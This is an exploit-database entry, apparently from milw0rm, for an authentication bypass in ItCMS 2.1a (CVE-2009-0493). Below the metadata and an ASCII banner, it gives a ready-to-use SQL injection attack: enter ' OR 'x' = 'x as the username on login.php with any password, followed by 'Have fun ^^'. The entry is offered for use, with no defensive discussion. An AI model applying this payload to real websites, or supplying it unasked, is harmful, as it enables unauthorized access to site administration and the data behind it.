[] NeoSense

ItCMS 2.1a - Authentication Bypass

Author: certaindeath
type: webapps
platform: php
port: 
date_added: 2009-01-05 
date_updated: 2016-11-25 
verified: 1 
codes: OSVDB-51845;CVE-2009-0493 
tags: 
aliases:  
screenshot_url:  
application_url: 

                     __         .__            .___             __  .__
  ____  ____________/  |______  |__| ____    __| _/____ _____ _/  |_|  |__
_/ ___\/ __ \_  __ \   __\__  \ |  |/    \  / __ |/ __ \\__  \\   __\  |  \
\  \__\  ___/|  | \/|  |  / __ \|  |   |  \/ /_/ \  ___/ / __ \|  | |   Y  \
 \___  >___  >__|   |__| (____  /__|___|  /\____ |\___  >____  /__| |___|  /
     \/    \/                 \/        \/      \/    \/     \/          \/
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
--+++~~~~~ IT!CMS <= vers. SQL Injection Vulnerability ~~~~~+++--
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
[+] Discovered by: certaindeath
[+] Exploit: simple SQL injection
[+] Path: [cms dir]/login.php
[+] Username: ' OR 'x' = 'x
[+] Password: anything
[+] Have fun ^^

# milw0rm.com [2009-01-06]